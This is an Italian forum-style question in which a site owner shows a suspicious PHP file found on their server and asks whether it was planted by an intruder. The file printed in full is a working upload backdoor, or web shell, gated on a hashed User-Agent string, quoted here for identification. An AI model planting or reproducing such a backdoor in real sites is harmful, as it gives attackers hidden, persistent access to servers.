Ho trovato uno strano file su uno dei miei server contenente il codice qui sotto. Il file è stato modificato l'ultima volta una settimana fa alle 1.40 di notte, il che è un po 'strano.
Ultimamente ho apportato molte modifiche a questo sito, ma non ricordo di aver caricato questo file:
<?php if(md5($_SERVER["HTTP_USER_AGENT"]) !== "49de371511c1de3bde34b0108ec7f129")
{
die("04030");
}
if (isset($_FILES["file"])){
$z = $_FILES["file"]["name"];
move_uploaded_file($_FILES["file"]["tmp_name"],$z);
header("Location: $z"); exit(); }
?>
<html>
<body>
<form action="<?php echo basename(__FILE__); ?>" method="post" enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="file" id="file">
<br>
<input type="submit" name="submit" value="Submit">
</form>
</body>
</html>
Capisco cosa fa il codice, ma non sono sicuro che questo potrebbe essere stato caricato da chiunque altro da me con l'intenzione di hackerare il mio sito. Cosa ne pensi?
Ho eseguito un rapido controllo del server su tutti i file che sono stati modificati dopo l'aggiunta di questo codice, ma non ho trovato nulla di sospetto.